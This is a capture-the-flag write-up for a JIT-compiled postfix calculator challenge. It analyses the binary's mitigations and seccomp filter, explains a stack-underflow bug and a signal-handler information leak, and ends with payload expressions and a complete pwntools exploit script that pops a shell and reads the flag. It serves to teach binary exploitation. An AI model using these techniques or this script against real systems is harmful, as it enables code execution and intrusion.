Postfix
4 files available
Description
Maths is hard so I made this super-fast JIT-powered calculator. You can even define funcions! It has many security features, I bet it's super safe!
Note: A VM is provided to help you replicate the remote setup. Keep in mind that this is NOT a kernel/microarch pwn!
Analysis
Checksec
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
As it can be seen, the binary has all the common mitigations enabled.
Seccomp
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x0000000c A = instruction_pointer >> 32
0001: 0x25 0x00 0x01 0x00006000 if (A <= 0x6000) goto 0003
0002: 0x25 0x00 0x01 0x00007000 if (A <= 0x7000) goto 0004
0003: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0004: 0x06 0x00 0x00 0x00000000 return KILL
A simple seccomp filter is also present and it forbids syscalls coming from IPs in the range 0x600000000000 - 0x700000000000.
Reversing
The binary allows you to define functions with up to one variable in postfix notation. The functions, after being parsed, are JIT-compiled in native x86 code. They can then be called, eventually providing the value of the variable.
Most of the logic happens during the parsing and compilation of the postfix expression.
This starts with the parse(expr_stack_t *out_stack, char *input, char **parsed)
function: the string is split into tokens, which then get pushed onto an expr_stack_t
structure as a pair of value and type.
When an operator is pushed (through the push_op
function) it gets optimized away if the two previous tokens are constants, since the result can be computed at parse-time as it does not depend on other operations or variables.
The expr_stack_t
is then passed to jit_expr
, which does the actual translation to x86 code.
A prologue which zeroes all registers and migrates to a separate stack (jit_stk
) is generated and it looks like this:
xor eax, eax ; xor all regs except from rdi and rsp
xor ebx, ebx
...
wrgsbase rsp ; save rsp for later
mov rsp, jit_stk ; migrate to jit_stk
call actual_jit_code ; call jit code
rdgsbase rsp ; restore rsp
ret
actual_jit_code:
...
The stack is then iterated:
- known-values become push operations through the
opt_push
function, which emits different instructions depending on the size of the value - variables become
push rdi
instructions (as the variable is passed throughrdi
) - operators are translated roughly to
pop rbx; pop rax; add/sub/imul/idiv ...; push rax
The opt_push
function also applies constant-blinding when a 32-bit or 64-bit constant is pushed as a mitigation against JIT-sprays. This is done by using val ^ rnd
where val
is the actual value and rnd
is a random value which gets generated by the function. A xor operation is then emitted to decrypt this constant at runtime and push it onto the stack.
The generated code might look like this:
; opt_push(0xAAAAAAAA)
mov rax, 0xB00CE592 ; = 0xAAAAAAAA ^ 0x1AA64F38
xor rax, 0x1AA64F38
push rax ; = 0xAAAAAAAA
The final result is then popped through pop rax
.
As a final note, the JIT code pages are allocated through jit_init
at random offsets in the region 0x600000000000-0x700000000000, which is the same range forbidden by the seccomp filter. The JIT stack is allocated by jit_stk_init
at a random offset in the region 0x300000000000-0x400000000000.
Vulnerabilities
Relative RIP control inside the JIT code
The main vulnerability is in the push_op
function: it should require two numbers on the stack to appply the operator, but the only check is for the stack containing at least two elements, which might not be both numbers. This can allow an attacker to perform a stack underflow, which, using the JIT operations, makes it possible to add arbitrary offsets to the return address of the JIT prologue.
An example might be 0 x + + 0
, which will add x
to the return address. The final constant is required as the code inside parse
keeps a variable named count
which keeps track of the amount of elements on the stack at runtime and is checked at the end of the function. If this value is different from 1 (which should be the element returned by the function), the parse
function will fail.
Information leak through the signal handler stack frame
When a division by zero occurs during the JIT execution, a SIGFPE signal is raised, and a registered sighandler is called. The handler will exit gracefully from the JIT area (through a siglongjmp) and inform the user that an error occurred without crashing the program. Since the sighandler isn't registered with the SA_ONSTACK
flag, when it gets invoked during JIT execution it will just use the JIT stack, spilling its stackframe onto it. This can be used to leak various information such as a libc address. It must be kept in mind that the signal handler stack frame has a variable size, since it depends on the size of the XSAVE
area, which depends on the enabled CPU features (and that's why the challenge was run under QEMU). This should not be a problem since the binary prints CPUID information at the start, including the maximum and actual size of this area.
Exploitation
We can first trigger the leak by doing a division by zero. To get it as close as possible we can abuse the stack underflow caused by the wrong check in push_op
.
A payload such as 0 x * * * * / 0 0 0 0
should do the trick. We can play with the number of *
and 0
(which must anyway be equal to match the count == 1
constaint) to lower the signal handler stack frame.
Since we can't really pop values from the stack arbitrarily, we'll have to abuse the relative rip control to try and move the stack pointer near a libc leak. We can then add a relative offset to this leak to get a one-gadget, which will give us a shell when the code returns. We can abuse the fact that 8-bit and 16-bit values are not blinded to try and encode instructions. Furthermore, 16-bit values still use a 32-bit push
instruction, causing them to be sign-extended. I found the enter
instruction to be particularly useful, since it allows us to move the stack pointer and we can encode it by pushing 0xXXC8
where XX is the amount of bytes which will be added to the stack pointer. As long as XX is less than 0x7F
, the value will be zero-extended and cause the encoding of a enter XX, 0
instruction, which will decrement the stack pointer by XX
.
Using this we can reach a libc address and change it to a one-gadget. We can then push one value (the JIT will need to pop a return value) and at the ret
instruction we'll get a shell. A payload for this might be x 0 * x - {rsp_offset << 8 | 0xc8} - {SPRAYED_INSN_OFFSET} + + {rsp_offset << 8 | 0xc8} x + + 0
, where x
is the value to be added to the libc pointer.
Exploit
#!/usr/bin/env python3
from pwn import *
HOST = args.HOST if args.HOST else "localhost"
PORT = args.PORT if args.PORT else 1337
def conn():
r = remote(HOST, PORT)
return r
def create_func(func_id, expr):
r.sendafter(b"> ", b"c\n")
r.sendafter(b"id: ", func_id.encode() + b"\n")
r.sendafter(b">>> ", expr.encode() + b"\n")
def execute_func(func_id, arg, get_res=False):
r.sendafter(b"> ", b"x\n")
r.sendafter(b"id: ", func_id.encode() + b"\n")
r.sendafter(b": ", arg.encode() + b"\n")
if get_res:
r.recvuntil("result: ")
return int(r.recvline().decode().strip())
def main():
global r
r = conn()
r.recvuntil(b"supported features: " + context.newline)
r.recvlines(4)
xsave_size = int(r.recvline().split(b" ")[1], 16)
log.info(f"xsave_max_size: {hex(xsave_size)}")
# 0xebcf8 execve("/bin/sh", rsi, rdx)
# constraints:
# address rbp-0x78 is writable
# [rsi] == NULL || rsi == NULL
# [rdx] == NULL || rdx == NULL
CODE_OFFSET = 49
trigger_sighandler = "0 x " + ("* " * (xsave_size//8 - 7)) + "/ " + ("0 " * (xsave_size//8 - 7))
payload = f"x 0 * x - {0x60c8} - {CODE_OFFSET} + + {0x60c8} x + + 0"
create_func("DIV0", trigger_sighandler)
execute_func("DIV0", "0")
# <__execvpe+1144>: lea rdi,[rip+0xec999]
one_gadget_addr = 0xebcf8
log.info(f"one_gadget_addr: {hex(one_gadget_addr)}")
# <_IO_2_1_stdin_+131>: 0x00000000
sighandler_leak_addr = 0x219b23
log.info(f"sighandler_leak_addr: {hex(sighandler_leak_addr)}")
offset = sighandler_leak_addr - one_gadget_addr
log.info(f"offset: {hex(offset)}")
create_func("PWN", payload)
execute_func("PWN", str(-offset))
r.sendline(b"cat flag.txt")
log.info(r.recvregex(b"snakeCTF{.*}", timeout=5).strip().split(context.newline)[-1].decode())
r.close()
if __name__ == "__main__":
main()